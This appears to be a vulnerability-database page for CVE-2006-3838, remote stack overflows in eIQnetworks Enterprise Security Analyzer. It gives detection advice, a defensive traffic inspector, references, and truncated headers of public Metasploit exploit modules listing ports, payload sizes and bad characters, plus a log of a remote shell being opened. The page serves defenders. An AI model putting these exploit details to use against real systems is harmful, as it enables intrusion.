CVE-2006-3838
Published 2006-07-27
Priority: P2 · 69 · critical
CVSS 2.0 base score: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Exploit: public exploits indexed (see below)
EPSS: 73.15% (99.4th percentile)
Multiple stack-based buffer overflows in eIQnetworks Enterprise Security Analyzer (ESA) before 2.5.0, as used in products including (a) Sidewinder, (b) iPolicy Security Manager, (c) Astaro Report Manager, (d) Fortinet FortiReporter, (e) Top Layer Network Security Analyzer, and possibly other products, allow remote attackers to execute arbitrary code via long (1) DELTAINTERVAL, (2) LOGFOLDER, (3) DELETELOGS, (4) FWASERVER, (5) SYSLOGPUBLICIP, (6) GETFWAIMPORTLOG, (7) GETFWADELTA, (8) DELETERDEPDEVICE, (9) COMPRESSRAWLOGFILE, (10) GETSYSLOGFIREWALLS, (11) ADDPOLICY, and (12) EDITPOLICY commands to the Syslog daemon (syslogserver.exe); (13) GUIADDDEVICE, (14) ADDDEVICE, and (15) DELETEDEVICE commands to the Topology server (Topology.exe); the (15) LICMGR_ADDLICENSE command to the License Manager (EnterpriseSecurityAnalyzer.exe); the (16) TRACE and (17) QUERYMONITOR commands to the Monitoring agent (Monitoring.exe); and possibly other vectors related to the Syslog daemon (syslogserver.exe).
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| eiqnetworks | enterprise_security_analyzer | <= 2.4.0 | — |
Detection & IOCs (extracted from sources)
- Monitor TCP port 10616 (License Manager / EnterpriseSecurityAnalyzer.exe) for connections sending oversized LICMGR_ADDLICENSE commands; payload buffer offsets of 494 or 1262 bytes are used in known exploits.
- Monitor TCP port 10628 (Topology server / Topology.exe) for connections sending oversized DELETEDEVICE commands; a 128-byte alphanumeric filler followed by a return address and NOP sled is the known exploit pattern.
- Alert on network traffic to port 10616 or 10628 containing the literal strings LICMGR_ADDLICENSE& or DELETEDEVICE& with arguments exceeding normal length bounds.
- Bad characters for LICMGR_ADDLICENSE exploit payloads are null byte, LF, CR, @, and &; encoded shellcode avoiding these bytes should be flagged in oversized command arguments.
- Bad characters for DELETEDEVICE exploit payloads are null byte, LF, CR, and space; encoded shellcode avoiding these bytes should be flagged in oversized DELETEDEVICE arguments on port 10628.
- The DELETEDEVICE exploit prepends a stack-pivot encoder stub (\x81\xc4\xff\xef\xff\xff\x44) before the payload; detect this byte sequence in traffic to port 10628.
- The LICMGR_ADDLICENSE exploit also prepends the same stack-pivot encoder stub (\x81\xc4\xff\xef\xff\xff\x44); detect this byte sequence in traffic to port 10616.
- Monitor syslogserver.exe for receipt of oversized DELTAINTERVAL, LOGFOLDER, DELETELOGS, FWASERVER, SYSLOGPUBLICIP, GETFWAIMPORTLOG, GETFWADELTA, DELETERDEPDEVICE, COMPRESSRAWLOGFILE, GETSYSLOGFIREWALLS, ADDPOLICY, or EDITPOLICY commands.
- Monitor Monitoring.exe for receipt of oversized TRACE or QUERYMONITOR commands.
- Exploits were tested only against ESA v2.1.13; return addresses and offsets may differ on other versions or OEM rebrands.
- Multiple OEM-rebranded products share the same vulnerable codebase and the same exploit port/command structure; detection rules should cover all branded variants.
- Two distinct payload buffer sizes (494 and 1262 bytes) are used depending on the target OEM variant; detection thresholds should account for both.
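As an added example (not code from the page's sources, eIQnetworks or Metasploit), the following inspector applies the bullets above to a single client-to-server message. It assumes commands are framed as NAME&arg1&arg2..., as the literal-string bullet describes; MAX_ARG_LEN and the sample messages are constructed, and only the two listener ports named on the page are mapped.

```python
from dataclasses import dataclass

# Commands named in the CVE text, grouped by the daemon that parses them.
COMMANDS = {
    "syslogserver.exe": {"DELTAINTERVAL", "LOGFOLDER", "DELETELOGS", "FWASERVER",
                         "SYSLOGPUBLICIP", "GETFWAIMPORTLOG", "GETFWADELTA",
                         "DELETERDEPDEVICE", "COMPRESSRAWLOGFILE",
                         "GETSYSLOGFIREWALLS", "ADDPOLICY", "EDITPOLICY"},
    "Topology.exe": {"GUIADDDEVICE", "ADDDEVICE", "DELETEDEVICE"},
    "EnterpriseSecurityAnalyzer.exe": {"LICMGR_ADDLICENSE"},
    "Monitoring.exe": {"TRACE", "QUERYMONITOR"},
}
# Stack-pivot stub reported for both Metasploit modules (add esp, -0x1001 ; inc esp).
PIVOT_STUB = b"\x81\xc4\xff\xef\xff\xff\x44"
# Assumed "normal" argument bound; tune it to what legitimate ESA traffic shows.
MAX_ARG_LEN = 256

@dataclass
class Alert:
    port: int
    service: str
    command: str
    reason: str

def inspect(dst_port: int, payload: bytes) -> list:
    """Return alerts for one message; assumes NAME&arg1&arg2... framing."""
    alerts = []
    name, sep, rest = payload.partition(b"&")
    if not sep:                      # not a framed command, nothing to judge
        return alerts
    command = name.decode("ascii", "replace")
    service = next((s for s, cmds in COMMANDS.items() if command in cmds), None)
    if service is None:              # not one of the commands the CVE lists
        return alerts
    longest = max(len(arg) for arg in rest.split(b"&"))
    if longest > MAX_ARG_LEN:
        alerts.append(Alert(dst_port, service, command,
                            f"oversized argument ({longest} bytes)"))
    if PIVOT_STUB in rest:
        alerts.append(Alert(dst_port, service, command, "stack-pivot stub in argument"))
    return alerts

# Constructed samples: a benign command and an oversized one (filler only).
BENIGN = b"DELETEDEVICE&fw-edge-01&"
OVERSIZED = b"LICMGR_ADDLICENSE&" + b"A" * 600 + b"&"

if __name__ == "__main__":
    for port, msg in ((10628, BENIGN), (10616, OVERSIZED)):
        print(port, inspect(port, msg))
```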
No detection rules found.
Exploit-DB
eIQNetworks ESA - License Manager LICMGR_ADDLICENSE Overflow (Metasploit)
exploitdb · 2010-09-20
---
##
# $Id: eiqnetworks_esa.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in eIQnetworks
Enterprise Security Analyzer. During the processing of
long arguments to the LICMGR_ADDLICENSE command, a stack-based
buffer overflow occurs. This module has only been tested
against ESA v2.1.13.
},
'Author' => [ '
Exploit-DB
eIQNetworks ESA - Topology DELETEDEVICE Overflow (Metasploit)
exploitdb · 2010-09-20
---
##
# $Id: eiqnetworks_esa_topology.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'eIQNetworks ESA Topology DELETEDEVICE Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in eIQnetworks
Enterprise Security Analyzer. During the processing of
long arguments to the DELETEDEVICE command in the Topology
server, a stack-based buffer overflow occurs.
This module has only been tested against ESA v2.1.13.
},
'Author' =>
Exploit-DB
eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (3)
exploitdb · 2006-08-07
---
#!/usr/bin/perl -w
package Msf::Exploit::EiQ_License;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'EIQ License Manager Overflow',
'Authors' => [ 'ri0t [email protected] KF [email protected]' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'seh' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 10616],
},
'Payload' =>
{
'Space' => 494,
'BadChars' => "\x00\x0a\x0d\x40\x26",
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a buffer overflow in the LICENCE_MANAGER field of
EiQ networks Enterprise Security Analyzer. This bug
Exploit-DB
eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)
exploitdb · 2006-07-27
---
#!/usr/bin/perl -w
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006
# Bug found by Titon of Bastard Labs.
#
# http://www.zerodayinitiative.com/advisories/ZDI-06-024.html
#
# Exploit for * Security Analyzer by eiQnetworks (OEM for Several vendors)
#
# kfinisterre@kfinisterre01:~$ ./eiQ_multi.pl 2 192.168.0.13
# *** Target: NetworkSecurityAnalyzerv4.2.27.exe, Len: 1262
# Exploiting 192.168.0.13
# kfinisterre@kfinisterre01:~$ telnet 192.168.0.13 4444
# Trying 192.168.0.13...
# Connected to 192.168.0.13.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Network Security Analyzer\fwa>exit
#
Exploit-DB
eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (2)
exploitdb · 2006-07-26
---
#!/usr/bin/perl -w
#metasploit module for EIQ Licence manager overflow Provided by ri0t of Bastard Labs
package Msf::Exploit::EiQ_License_494;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'EIQ License Manager Overflow',
'Authors' => [ 'ri0t [email protected], KF [email protected]' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'seh' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 10616],
},
'Payload' =>
{
'Space' => 494,
'BadChars' => "\x00\x0a\x0d\x40\x26",
},
'Description' => Pex::Text::Freeform(qq{
This module exploits the buffer
Exploit-DB
eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (1)
exploitdb · 2006-07-26
---
#!/usr/bin/perl -w
#metasploit module for EIQ Licence manager overflow Provided by ri0t of Bastard Labs
package Msf::Exploit::EiQ_License_1262;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'EIQ License Manager Overflow',
'Authors' => [ 'ri0t [email protected], KF [email protected]' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'seh' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 10616],
},
'Payload' =>
{
'Space' => 1262,
'BadChars' => "\x00\x0a\x0d\x40\x26",
},
'Description' => Pex::Text::Freeform(qq{
This module exploits the buff
Metasploit
eIQNetworks ESA Topology DELETEDEVICE Overflow
metasploit
This module exploits a stack buffer overflow in eIQnetworks Enterprise Security Analyzer. During the processing of long arguments to the DELETEDEVICE command in the Topology server, a stack-based buffer overflow occurs. This module has only been tested against ESA v2.1.13.
Metasploit
eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow
metasploit
This module exploits a stack buffer overflow in eIQnetworks Enterprise Security Analyzer. During the processing of long arguments to the LICMGR_ADDLICENSE command, a stack-based buffer overflow occurs. This module has only been tested against ESA v2.1.13.
No writeups or analysis indexed.
References
- http://archive.cert.uni-stuttgart.de/bugtraq/2006/08/msg00152.html
- http://secunia.com/advisories/21211
- http://secunia.com/advisories/21213
- http://secunia.com/advisories/21214
- http://secunia.com/advisories/21215
- http://secunia.com/advisories/21217
- http://secunia.com/advisories/21218
- http://securitytracker.com/id?1016580
- http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf
- http://www.kb.cert.org/vuls/id/513068
- http://www.osvdb.org/27525
- http://www.osvdb.org/27526
- http://www.osvdb.org/27527
- http://www.osvdb.org/27528
- http://www.securityfocus.com/archive/1/441195/100/0/threaded
- http://www.securityfocus.com/archive/1/441197/100/0/threaded
- http://www.securityfocus.com/archive/1/441198/100/0/threaded
- http://www.securityfocus.com/archive/1/441200/100/0/threaded
- http://www.securityfocus.com/bid/19163
- http://www.securityfocus.com/bid/19164
- http://www.securityfocus.com/bid/19165
- http://www.securityfocus.com/bid/19167
- http://www.tippingpoint.com/security/advisories/TSRT-06-03.html
- http://www.tippingpoint.com/security/advisories/TSRT-06-04.html
- http://www.tippingpoint.com/security/advisories/TSRT-06-07.html
- http://www.vupen.com/english/advisories/2006/2985
- http://www.vupen.com/english/advisories/2006/3006
- http://www.vupen.com/english/advisories/2006/3007
- http://www.vupen.com/english/advisories/2006/3008
- http://www.vupen.com/english/advisories/2006/3009
- http://www.vupen.com/english/advisories/2006/3010
- http://www.zerodayinitiative.com/advisories/ZDI-06-023.html
- http://www.zerodayinitiative.com/advisories/ZDI-06-024.html
- https://exchange.xforce.ibmcloud.com/vulnerabilities/27950
- https://exchange.xforce.ibmcloud.com/vulnerabilities/27951
- https://exchange.xforce.ibmcloud.com/vulnerabilities/27952
- https://exchange.xforce.ibmcloud.com/vulnerabilities/27953
- https://exchange.xforce.ibmcloud.com/vulnerabilities/27954